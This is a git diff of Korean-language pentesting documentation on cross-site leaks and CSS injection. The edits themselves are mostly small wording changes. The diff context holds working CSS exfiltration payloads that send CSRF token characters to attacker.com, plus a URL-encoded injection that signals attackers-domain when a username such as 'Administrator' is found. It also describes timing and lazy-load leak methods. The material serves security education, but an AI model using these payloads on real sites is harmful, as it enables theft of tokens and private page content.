@@ -743,19 +743,19 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 - **Summary:** 공격자는 iframe을 활용하여 파일 다운로드를 감지할 수 있으며, iframe의 지속적인 접근 가능성은 파일 다운로드가 성공적으로 이루어졌음을 나타냅니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
 
-`Content-Disposition` 헤더, 특히 `Content-Disposition: attachment`는 브라우저에 콘텐츠를 인라인으로 표시하는 대신 다운로드하도록 지시합니다. 이 동작은 사용자가 파일 다운로드를 유발하는 페이지에 접근할 수 있는지 감지하는 데 악용될 수 있습니다. 크로미움 기반 브라우저에서는 이 다운로드 동작을 감지하는 몇 가지 기술이 있습니다:
+`Content-Disposition` 헤더, 특히 `Content-Disposition: attachment`는 브라우저에 콘텐츠를 인라인으로 표시하는 대신 다운로드하도록 지시합니다. 이 동작은 사용자가 파일 다운로드를 트리거하는 페이지에 접근할 수 있는지 감지하는 데 악용될 수 있습니다. 크로미움 기반 브라우저에서는 이 다운로드 동작을 감지하는 몇 가지 기술이 있습니다:
 
 1. **다운로드 바 모니터링**:
 - 크로미움 기반 브라우저에서 파일이 다운로드되면 브라우저 창 하단에 다운로드 바가 나타납니다.
 - 창 높이의 변화를 모니터링하여 다운로드 바의 나타남을 추론할 수 있습니다.
 2. **iframe을 통한 다운로드 탐색**:
-- 페이지가 `Content-Disposition: attachment` 헤더를 사용하여 파일 다운로드를 유발할 때 탐색 이벤트를 발생시키지 않습니다.
+- 페이지가 `Content-Disposition: attachment` 헤더를 사용하여 파일 다운로드를 트리거할 때 탐색 이벤트를 발생시키지 않습니다.
 - 콘텐츠를 iframe에 로드하고 탐색 이벤트를 모니터링하여 콘텐츠 배치가 파일 다운로드를 유발하는지(탐색 없음) 여부를 확인할 수 있습니다.
 3. **iframe 없이 다운로드 탐색**:
 - iframe 기술과 유사하게, 이 방법은 iframe 대신 `window.open`을 사용합니다.
-- 새로 열린 창에서 탐색 이벤트를 모니터링하여 파일 다운로드가 유발되었는지(탐색 없음) 또는 콘텐츠가 인라인으로 표시되었는지(탐색 발생)를 확인할 수 있습니다.
+- 새로 열린 창에서 탐색 이벤트를 모니터링하여 파일 다운로드가 트리거되었는지(탐색 없음) 또는 콘텐츠가 인라인으로 표시되었는지(탐색 발생)를 확인할 수 있습니다.
 
-로그인한 사용자만 이러한 다운로드를 유발할 수 있는 시나리오에서는 이러한 기술을 사용하여 다운로드 요청에 대한 브라우저의 응답을 기반으로 사용자의 인증 상태를 간접적으로 추론할 수 있습니다.
+로그인한 사용자만 이러한 다운로드를 트리거할 수 있는 경우, 이러한 기술을 사용하여 다운로드 요청에 대한 브라우저의 응답을 기반으로 사용자의 인증 상태를 간접적으로 추론할 수 있습니다.
 
 ### Partitioned HTTP Cache Bypass <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
 
@@ -771,7 +771,7 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 
 사이트 `example.com`이 `*.example.com/resource`에서 리소스를 포함하면 해당 리소스는 **최상위 탐색을 통해 직접 요청된 것과 동일한 캐싱 키**를 갖습니다. 이는 캐싱 키가 최상위 _eTLD+1_ 및 프레임 _eTLD+1_로 구성되기 때문입니다.
 
-캐시에 접근하는 것이 리소스를 로드하는 것보다 빠르기 때문에, 페이지의 위치를 변경하고 20ms 후에 취소하는 것을 시도할 수 있습니다(예:). 원본이 중지 후 변경되었다면, 리소스가 캐시되었음을 의미합니다.\
+캐시에 접근하는 것이 리소스를 로드하는 것보다 빠르기 때문에, 페이지의 위치를 변경하고 20ms 후(예:) 취소할 수 있습니다. 원본이 중지 후 변경되었다면, 리소스가 캐시되었음을 의미합니다.\
 또는 **잠재적으로 캐시된 페이지에 대해 fetch를 보내고 소요 시간을 측정할 수 있습니다**.
 
 ### Manual Redirect <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
@@ -789,7 +789,7 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 - **Inclusion Methods**: Fetch API
 - **Detectable Difference**: Timing
 - **More info**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
-- **Summary:** 리소스를 로드하려고 시도하고 로드되기 전에 로드를 중단할 수 있습니다. 오류가 발생하는지 여부에 따라 리소스가 캐시되었거나 그렇지 않습니다.
+- **Summary:** 리소스를 로드하려고 시도하고 로드되기 전에 중단합니다. 오류가 발생하는지 여부에 따라 리소스가 캐시되었거나 그렇지 않습니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller](https://xsleaks.dev/docs/attacks/cache-probing/#fetch-with-abortcontroller)
 
 **fetch**와 **setTimeout**을 사용하여 **AbortController**로 리소스가 **캐시되었는지** 감지하고 특정 리소스를 브라우저 캐시에서 제거할 수 있습니다. 또한, 이 과정은 새로운 콘텐츠를 캐시하지 않고 발생합니다.
@@ -810,19 +810,19 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 - **Summary:** 서비스 워커를 사용하여 웹의 실행 시간을 측정합니다.
 - **Code Example**:
 
-주어진 시나리오에서 공격자는 자신의 도메인 중 하나인 "attacker.com" 내에서 **서비스 워커**를 등록하는 주도권을 잡습니다. 다음으로, 공격자는 메인 문서에서 대상 웹사이트의 새 창을 열고 **서비스 워커**에게 타이머를 시작하도록 지시합니다. 새 창이 로드되기 시작하면 공격자는 이전 단계에서 얻은 참조를 **서비스 워커**가 관리하는 페이지로 탐색합니다.
+주어진 시나리오에서 공격자는 자신의 도메인 중 하나인 "attacker.com" 내에서 **서비스 워커**를 등록하는 주도권을 잡습니다. 다음으로, 공격자는 메인 문서에서 대상 웹사이트의 새 창을 열고 **서비스 워커**에 타이머를 시작하도록 지시합니다. 새 창이 로드되기 시작하면 공격자는 이전 단계에서 얻은 참조를 **서비스 워커**가 관리하는 페이지로 탐색합니다.
 
 이전 단계에서 시작된 요청이 도착하면 **서비스 워커**는 **204 (No Content)** 상태 코드로 응답하여 탐색 프로세스를 종료합니다. 이 시점에서 **서비스 워커**는 이전 단계에서 시작된 타이머의 측정을 캡처합니다. 이 측정치는 탐색 프로세스의 지연을 초래하는 JavaScript의 지속 시간에 영향을 받습니다.
 
 > [!WARNING]
-> 실행 타이밍에서는 **네트워크 요인**을 **제거**하여 **더 정확한 측정값**을 얻을 수 있습니다. 예를 들어, 페이지를 로드하기 전에 페이지에서 사용하는 리소스를 로드하는 것입니다.
+> 실행 타이밍에서는 **네트워크 요인**을 제거하여 **더 정확한 측정값**을 얻을 수 있습니다. 예를 들어, 페이지를 로드하기 전에 페이지에서 사용하는 리소스를 로드합니다.
 
 ### Fetch Timing
 
 - **Inclusion Methods**: Fetch API
 - **Detectable Difference**: Timing (generally due to Page Content, Status Code)
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
-- **Summary:** 요청을 수행하는 데 걸리는 시간을 측정하기 위해 [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow)를 사용합니다. 다른 시계도 사용할 수 있습니다.
+- **Summary:** 요청을 수행하는 데 걸리는 시간을 측정하기 위해 [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow)를 사용합니다. 다른 시계를 사용할 수 있습니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#modern-web-timing-attacks)
 
 ### Cross-Window Timing
@@ -830,13 +830,13 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 - **Inclusion Methods**: Pop-ups
 - **Detectable Difference**: Timing (generally due to Page Content, Status Code)
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
-- **Summary:** `window.open`을 사용하여 요청을 수행하는 데 걸리는 시간을 측정하기 위해 [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow)를 사용합니다. 다른 시계도 사용할 수 있습니다.
+- **Summary:** `window.open`을 사용하여 요청을 수행하는 데 걸리는 시간을 측정하기 위해 [performance.now()](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow)를 사용합니다. 다른 시계를 사용할 수 있습니다.
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
 
 
 ## With HTML or Re Injection
 
-여기에서는 교차 출처 HTML에서 **HTML 콘텐츠를 주입하여** 정보를 유출하는 기술을 찾을 수 있습니다. 이러한 기술은 어떤 이유로든 **HTML을 주입할 수 있지만 JS 코드를 주입할 수 없는 경우** 흥미롭습니다.
+여기에서는 교차 출처 HTML에서 정보를 유출하는 기술을 찾을 수 있습니다 **HTML 콘텐츠를 주입하는 경우**. 이러한 기술은 어떤 이유로든 **HTML을 주입할 수 있지만 JS 코드를 주입할 수 없는 경우** 흥미롭습니다.
 
 ### Dangling Markup
 
@@ -846,21 +846,21 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 
 ### Image Lazy Loading
 
-비밀 이전에 **HTML을 추가할 수** 있어야 하고 **콘텐츠를 유출해야** 하는 경우, **일반적인 dangling markup 기술**을 확인해야 합니다.\
-그러나 어떤 이유로든 **문자 단위로** 수행해야 하는 경우(아마도 통신이 캐시 적중을 통해 이루어지기 때문) 이 트릭을 사용할 수 있습니다.
+비밀 이전에 **HTML을 추가해야** 하고 **콘텐츠를 유출해야** 하는 경우 **일반적인 dangling markup 기술**을 확인해야 합니다.\
+그러나 어떤 이유로든 **문자 단위로** 수행해야 하는 경우(아마도 통신이 캐시 적중을 통해 이루어지기 때문) 이 요령을 사용할 수 있습니다.
 
-HTML의 **이미지**는 "**loading**" 속성이 있으며, 그 값은 "**lazy**"일 수 있습니다. 이 경우 이미지는 페이지가 로드되는 동안이 아니라 볼 때 로드됩니다:
+HTML의 **이미지**에는 "**loading**" 속성이 있으며, 그 값은 "**lazy**"일 수 있습니다. 이 경우 이미지는 페이지가 로드되는 동안이 아니라 볼 때 로드됩니다:
 ```html
 <img src=/something loading=lazy >
 ```
-따라서 할 수 있는 것은 **많은 쓰레기 문자**를 **추가하는 것**입니다 (예: **수천 개의 "W"**) **비밀 앞에 웹 페이지를 채우거나** `<br><canvas height="1850px"></canvas><br>`와 같은 것을 추가하는 것입니다.\
-예를 들어, 우리의 **주입이 플래그 앞에 나타나면**, **이미지**가 **로드되지만**, **플래그 뒤에 나타나면**, 플래그 + 쓰레기가 **로드되는 것을 방지합니다** (얼마나 많은 쓰레기를 배치할지는 조정해야 합니다). 이것은 [**이 글**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)에서 발생한 일입니다.
+따라서, 할 수 있는 것은 **많은 쓰레기 문자** (예: **수천 개의 "W"**)를 **비밀 앞에 웹 페이지를 채우기 위해 추가하는 것**입니다. 또는 **다음과 같은 것을 추가하는 것입니다**: `<br><canvas height="1850px"></canvas><br>.`\
+그런 다음 예를 들어 우리의 **주입이 플래그 앞에 나타나면**, **이미지**가 **로드될 것이지만**, **플래그 뒤에 나타나면**, 플래그 + 쓰레기가 **로드되는 것을 방지할 것입니다** (얼마나 많은 쓰레기를 배치할지는 실험해봐야 합니다). 이것은 [**이 글**](https://blog.huli.tw/2022/10/08/en/sekaictf2022-safelist-and-connection/)에서 발생한 일입니다.
 
-또 다른 옵션은 **scroll-to-text-fragment**를 사용하는 것입니다, 허용된다면: 
+또 다른 옵션은 **scroll-to-text-fragment**를 사용하는 것입니다, 허용된다면:
 
 #### Scroll-to-text-fragment
 
-그러나 **봇이 페이지에 접근하게** 하려면 다음과 같은 것을 사용해야 합니다.
+그러나, **봇이 페이지에 접근하도록** 다음과 같은 것을 사용합니다:
 ```
 #:~:text=SECR
 ```
@@ -888,7 +888,7 @@ event-loop-blocking-+-lazy-images.md
 
 ### CSS ReDoS
 
-`jQuery(location.hash)`가 사용되면, **일부 HTML 콘텐츠가 존재하는지** 타이밍을 통해 확인할 수 있습니다. 이는 선택자 `main[id='site-main']`가 일치하지 않으면 나머지 **선택자**를 확인할 필요가 없기 때문입니다.
+`jQuery(location.hash)`가 사용되면, **일부 HTML 콘텐츠가 존재하는지** 타이밍을 통해 알아낼 수 있습니다. 이는 선택자 `main[id='site-main']`가 일치하지 않으면 나머지 **선택자**를 확인할 필요가 없기 때문입니다.
 ```javascript
 $(
 "*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']"
diff --git a/src/pentesting-web/xs-search/connection-pool-example.md b/src/pentesting-web/xs-search/connection-pool-example.md
index bd1d213bd..3f7fe3bff 100644
--- a/src/pentesting-web/xs-search/connection-pool-example.md
+++ b/src/pentesting-web/xs-search/connection-pool-example.md
@@ -17,14 +17,14 @@ In the [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaic
 
 - **플래그**의 알려진 부분으로 **시작하는 새로운 게시물**을 생성하고 여러 **img** **로드**를 합니다.
 - **위치 0**의 **게시물**을 **삭제**합니다.
-- 255개의 소켓을 차단합니다.
+- 255 소켓을 차단합니다.
 - 게시물이 있는 페이지를 로드합니다.
 - 사이트에 대해 5개의 무작위 요청을 수행하고 이 작업에 걸리는 시간을 측정합니다.
 
 > [!WARNING]
 > 만약 **삭제된** 게시물이 **플래그**였다면, 이는 모든 **주입된 이미지**가 **5개의 무작위 요청**과 **차단되지 않은** 소켓을 두고 **경쟁**하게 된다는 것을 의미합니다. 이는 측정된 시간이 다른 시나리오보다 더 길어질 것임을 의미합니다.
 >
-> 만약 **삭제된** 게시물이 **HTML**이라면, **5개의 무작위 요청**은 **더 빠를** 것이며, 주입된 HTML과 그 소켓을 두고 경쟁할 필요가 없습니다.
+> 만약 **삭제된** 게시물이 **HTML**이라면, **5개의 무작위 요청**은 **더 빠르게** 진행될 것입니다. 왜냐하면 그들은 주입된 HTML과 그 소켓을 두고 경쟁할 필요가 없기 때문입니다.
 
 ### Exploit 1
 
@@ -173,7 +173,7 @@ pwn()
 ```
 ### Exploit 2
 
-같은 전술이지만 [https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/](https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/)의 다른 코드입니다.
+같은 전술이지만 [https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/](https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/)에서 다른 코드입니다.
 ```html
 <!DOCTYPE html>
 <html>
diff --git a/src/pentesting-web/xs-search/css-injection/README.md b/src/pentesting-web/xs-search/css-injection/README.md
index 8897ab4bc..de62a038b 100644
--- a/src/pentesting-web/xs-search/css-injection/README.md
+++ b/src/pentesting-web/xs-search/css-injection/README.md
@@ -6,7 +6,7 @@
 
 ### Attribute Selector
 
-CSS 선택자는 `input` 요소의 `name` 및 `value` 속성의 값을 일치시키도록 작성됩니다. 입력 요소의 값 속성이 특정 문자로 시작하면 미리 정의된 외부 리소스가 로드됩니다:
+CSS 선택자는 `input` 요소의 `name` 및 `value` 속성의 값을 일치시키도록 제작됩니다. 입력 요소의 값 속성이 특정 문자로 시작하면, 미리 정의된 외부 리소스가 로드됩니다:
 ```css
 input[name="csrf"][value^="a"] {
 background-image: url(https://attacker.com/exfil/a);
@@ -23,7 +23,7 @@ background-image: url(https://attacker.com/exfil/9);
 
 #### 숨겨진 요소 우회
 
-이 제한을 우회하기 위해, `~` 일반 형제 결합기를 사용하여 후속 형제 요소를 타겟팅할 수 있습니다. 그러면 CSS 규칙이 숨겨진 입력 요소 다음에 오는 모든 형제에게 적용되어 배경 이미지가 로드됩니다:
+이 제한을 우회하기 위해, `~` 일반 형제 조합기를 사용하여 후속 형제 요소를 타겟팅할 수 있습니다. 그러면 CSS 규칙이 숨겨진 입력 요소 다음에 오는 모든 형제에게 적용되어 배경 이미지가 로드됩니다:
 ```css
 input[name="csrf"][value^="csrF"] ~ * {
 background-image: url(https://attacker.com/exfil/csrF);
@@ -36,7 +36,7 @@ background-image: url(https://attacker.com/exfil/csrF);
 CSS 인젝션 기술이 효과적이기 위해서는 특정 조건이 충족되어야 합니다:
 
 1. **페이로드 길이**: CSS 인젝션 벡터는 제작된 선택자를 수용할 수 있도록 충분히 긴 페이로드를 지원해야 합니다.
-2. **CSS 재평가**: 페이지를 프레임할 수 있는 능력이 있어야 하며, 이는 새로 생성된 페이로드로 CSS의 재평가를 트리거하는 데 필요합니다.
+2. **CSS 재평가**: 새로 생성된 페이로드로 CSS의 재평가를 트리거하기 위해 페이지를 프레임할 수 있어야 합니다.
 3. **외부 리소스**: 이 기술은 외부 호스팅된 이미지를 사용할 수 있는 능력을 전제로 합니다. 이는 사이트의 콘텐츠 보안 정책(CSP)에 의해 제한될 수 있습니다.
 
 ### 블라인드 속성 선택자
@@ -52,11 +52,11 @@ background: url(/m);
 <input name="mytoken" value="1337" />
 <input name="myname" value="gareth" />
 ```
-이것을 다음 **@import** 기술과 결합하면, **blind pages with** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**로부터 많은 **정보를 유출할 수 있습니다.**
+이것을 다음 **@import** 기술과 결합하면, **[**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**를 사용하여 **블라인드 페이지에서 많은 정보를 유출할 수 있습니다.**
 
 ### @import
 
-이전 기술에는 몇 가지 단점이 있으므로, 전제 조건을 확인해야 합니다. **희생자에게 여러 링크를 보낼 수 있어야 하거나**, **CSS injection 취약 페이지를 iframe으로 불러올 수 있어야 합니다.**
+이전 기술에는 몇 가지 단점이 있으므로, 전제 조건을 확인해야 합니다. **희생자에게 여러 링크를 보낼 수 있어야 하거나**, **CSS 주입 취약 페이지를 iframe으로 불러올 수 있어야 합니다.**
 
 그러나 **CSS `@import`**를 사용하여 기술의 품질을 향상시키는 또 다른 영리한 기술이 있습니다.
 
@@ -68,7 +68,7 @@ background: url(/m);
 ```
 1. 가져오기는 **공격자로부터 CSS 스크립트를 수신할 것이고** **브라우저는 이를 로드할 것입니다**.
 2. 공격자가 보낼 CSS 스크립트의 첫 번째 부분은 **다시 공격자의 서버에 대한 또 다른 `@import`입니다.**
-1. 공격자의 서버는 이 요청에 아직 응답하지 않을 것이며, 우리는 몇 개의 문자를 유출한 다음 이 가져오기를 페이로드로 응답하여 다음 문자를 유출하고자 합니다.
+1. 공격자의 서버는 이 요청에 아직 응답하지 않을 것이며, 일부 문자를 유출한 다음 이 가져오기를 페이로드로 응답하여 다음 문자를 유출하려고 합니다.
 3. 페이로드의 두 번째이자 더 큰 부분은 **속성 선택자 유출 페이로드**가 될 것입니다.
 1. 이는 공격자의 서버에 **비밀의 첫 번째 문자와 마지막 문자를** 보낼 것입니다.
 4. 공격자의 서버가 **비밀의 첫 번째 문자와 마지막 문자를** 수신하면, **2단계에서 요청된 가져오기에 응답할 것입니다**.
@@ -79,7 +79,7 @@ background: url(/m);
 원본 [**Pepe Vila의 코드를 여기서 확인할 수 있습니다**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) 또는 거의 [**같은 코드지만 주석이 달린 것을 여기서 확인할 수 있습니다**.](./#css-injection)
 
 > [!NOTE]
-> 스크립트는 매번 2개의 문자를 발견하려고 시도할 것입니다 (시작 부분과 끝 부분에서) 왜냐하면 속성 선택자가 다음과 같은 작업을 가능하게 하기 때문입니다:
+> 스크립트는 매번 2개의 문자를 발견하려고 시도할 것입니다 (시작 부분과 끝 부분에서) 왜냐하면 속성 선택자가 다음과 같은 작업을 허용하기 때문입니다:
 >
 > ```css
 > /* value^=  값의 시작 부분과 일치 */
@@ -96,7 +96,7 @@ background: url(/m);
 > 이는 스크립트가 비밀을 더 빠르게 유출할 수 있게 합니다.
 
 > [!WARNING]
-> 때때로 스크립트는 **접두사 + 접미사가 이미 전체 플래그라는 것을 올바르게 감지하지 못하고** 계속 앞으로 (접두사에서) 및 뒤로 (접미사에서) 진행하여 어느 시점에서 멈출 수 있습니다.\
+> 때때로 스크립트는 **접두사 + 접미사로 발견된 것이 이미 전체 플래그임을 올바르게 감지하지 못하고** 계속 앞으로 (접두사에서) 및 뒤로 (접미사에서) 진행하여 어느 시점에서 멈출 수 있습니다.\
 > 걱정하지 마세요, **출력**을 확인하면 **거기에서 플래그를 볼 수 있습니다**.
 
 ### 다른 선택자
@@ -116,7 +116,7 @@ background-image: url("YOUR_SERVER_URL?1");
 
 **참조:** [CSS 기반 공격: @font-face의 unicode-range 악용](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [@terjanq의 오류 기반 XS-Search PoC](https://twitter.com/terjanq/status/1180477124861407234)
 
-전반적인 의도는 **제어된 엔드포인트에서 사용자 정의 글꼴을 사용하고** **지정된 리소스(`favicon.ico`)를 로드할 수 없는 경우에만 이 글꼴로 텍스트('A')가 표시되도록 하는 것입니다**.
+전반적인 의도는 **제어된 엔드포인트에서 사용자 정의 글꼴을 사용하고** **지정된 리소스(`favicon.ico`)를 로드할 수 없는 경우에만 이 글꼴로 텍스트(이 경우 'A')가 표시되도록 하는 것입니다**.
 ```html
 <!DOCTYPE html>
 <html>
@@ -164,7 +164,7 @@ content: url(target.png);
 ```
 http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
 ```
-여기서 공격은 HTML 주입을 조작하여 CSS 코드를 전송하며, "Administrator"라는 특정 텍스트를 목표로 합니다. Scroll-to-text fragment(`#:~:text=Administrator`)를 통해 텍스트가 발견되면, 지정된 리소스가 로드되어 공격자에게 그 존재를 무심코 신호를 보냅니다.
+여기서 공격은 HTML 주입을 조작하여 CSS 코드를 전송하며, "Administrator"라는 특정 텍스트를 목표로 합니다. Scroll-to-text fragment(`#:~:text=Administrator`)를 통해 텍스트가 발견되면, 지정된 리소스가 로드되어 공격자에게 그 존재를 무심코 신호합니다.
 
 완화를 위해 다음 사항을 유의해야 합니다:
 
@@ -176,11 +176,11 @@ http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:
 
 자세한 정보는 원본 보고서를 확인하세요: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
 
-여기에서 [**CTF를 위한 이 기술을 사용한 익스플로잇을 확인할 수 있습니다**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
+이 기술을 사용한 [**CTF용 익스플로잇을 여기서 확인할 수 있습니다**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
 
 ### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
 
-특정 유니코드 값에 대해 **외부 글꼴을 지정할 수 있으며**, 해당 유니코드 값이 페이지에 존재할 경우에만 **수집됩니다**. 예를 들어:
+특정 유니코드 값에 대해 **외부 글꼴을 지정할 수 있으며**, 해당 유니코드 값이 페이지에 존재할 때만 **수집됩니다**. 예를 들어:
 ```html
 <style>
 @font-face {
@@ -210,9 +210,9 @@ htm
 
 ### 텍스트 노드 유출 (I): 리가처 <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
 
-**참고:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
+**참조:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
 
-설명된 기술은 글꼴 리가처를 이용하여 노드에서 텍스트를 추출하고 너비 변화를 모니터링하는 것입니다. 이 과정은 여러 단계로 이루어집니다:
+설명된 기술은 글꼴 리가처를 이용하여 노드에서 텍스트를 추출하고 너비의 변화를 모니터링하는 것입니다. 이 과정은 여러 단계를 포함합니다:
 
 1. **커스텀 글꼴 생성**:
 
@@ -251,7 +251,7 @@ background: url(http://attacker.com/?leak);
 
 ### 텍스트 노드 유출 (II): 기본 글꼴로 문자 집합 유출 (외부 자산 필요 없음) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
-**참고:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
+**참조:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
 
 이 트릭은 이 [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what_can_we_do_with_single_css_injection/)에서 공개되었습니다. 텍스트 노드에서 사용되는 문자 집합은 브라우저에 설치된 **기본 글꼴**을 사용하여 유출될 수 있습니다: 외부 또는 사용자 정의 글꼴이 필요하지 않습니다.
 
@@ -275,7 +275,7 @@ B
 
 이 전환 동안, **unicode-range 트릭**이 사용되어 접두사에 새 문자가 추가될 때마다 이를 식별합니다. 이는 Comic Sans로 글꼴을 전환하여 이루어지며, 이는 기본 글꼴보다 눈에 띄게 더 높아 수직 스크롤바를 유발합니다. 이 스크롤바의 출현은 접두사에 새 문자가 존재함을 간접적으로 드러냅니다.
 
-이 방법은 고유한 문자가 나타날 때 감지할 수 있지만, 어떤 문자가 반복되었는지는 명시하지 않고 단지 반복이 발생했음을 나타냅니다.
+이 방법은 고유한 문자가 나타날 때 이를 감지할 수 있지만, 어떤 문자가 반복되었는지는 명시하지 않고 단지 반복이 발생했음을 나타냅니다.
 
 > [!NOTE]
 > 기본적으로, **unicode-range는 문자를 감지하는 데 사용되지만**, 외부 글꼴을 로드하고 싶지 않기 때문에 다른 방법을 찾아야 합니다.\
@@ -710,13 +710,13 @@ background: blue var(--leak);
 
 **참고:** 이는 [이 글에서 실패한 해결책으로 언급됨](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
-이 경우는 이전 경우와 매우 유사하지만, 이 경우 특정 **문자를 다른 문자보다 크게 만들어서** 버튼이 봇에 의해 눌리지 않도록 하거나 로드되지 않을 이미지를 숨기는 것이 목표입니다. 따라서 우리는 행동(또는 행동의 부재)을 측정하고 텍스트 내에 특정 문자가 존재하는지 알 수 있습니다.
+이 경우는 이전 경우와 매우 유사하지만, 이 경우 특정 **문자를 다른 문자보다 크게 만들어서** 버튼이 봇에 의해 눌리지 않도록 하거나 로드되지 않을 이미지를 숨기는 것이 목표입니다. 따라서 우리는 행동(또는 행동의 부재)을 측정하고 특정 문자가 텍스트 안에 존재하는지 알 수 있습니다.
 
 ### 텍스트 노드 유출 (III): 캐시 타이밍으로 문자 집합 유출하기 (외부 자산 필요 없음) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
 **참고:** 이는 [이 글에서 실패한 해결책으로 언급됨](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
 
-이 경우, 동일한 출처에서 가짜 글꼴을 로드하여 텍스트에 문자가 있는지 유출하려고 시도할 수 있습니다:
+이 경우, 우리는 동일한 출처에서 가짜 글꼴을 로드하여 텍스트에 문자가 있는지 유출하려고 시도할 수 있습니다:
 ```css
 @font-face {
 font-family: "A1";
@@ -724,9 +724,9 @@ src: url(/static/bootstrap.min.css?q=1);
 unicode-range: U+0041;
 }
 ```
-일치하는 경우, **폰트는 `/static/bootstrap.min.css?q=1`에서 로드됩니다**. 성공적으로 로드되지는 않지만, **브라우저는 이를 캐시해야 하며**, 캐시가 없더라도 **304 not modified** 메커니즘이 있으므로, **응답은 다른 것들보다 더 빠를 것입니다**.
+일치하는 경우, **폰트는 `/static/bootstrap.min.css?q=1`에서 로드됩니다**. 비록 성공적으로 로드되지는 않겠지만, **브라우저는 이를 캐시해야 하며**, 캐시가 없더라도 **304 not modified** 메커니즘이 있으므로, **응답은 다른 것들보다 더 빠를 것입니다**.
 
-그러나 캐시된 응답과 비캐시된 응답의 시간 차이가 충분히 크지 않으면, 이는 유용하지 않을 것입니다. 예를 들어, 저자는 다음과 같이 언급했습니다: 그러나 테스트 후, 첫 번째 문제는 속도가 그리 다르지 않다는 것이고, 두 번째 문제는 봇이 `disk-cache-size=1` 플래그를 사용한다는 것입니다. 이는 정말 사려 깊습니다.
+그러나 캐시된 응답과 비캐시된 응답의 시간 차이가 충분히 크지 않다면, 이는 유용하지 않을 것입니다. 예를 들어, 저자는 다음과 같이 언급했습니다: 그러나 테스트 후, 첫 번째 문제는 속도가 그리 다르지 않다는 것이고, 두 번째 문제는 봇이 `disk-cache-size=1` 플래그를 사용한다는 것이며, 이는 정말 사려 깊습니다.
 
 ### 텍스트 노드 유출 (III): 수백 개의 로컬 "폰트" 로딩 시간으로 charset 유출 (외부 자산 필요 없음) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
 
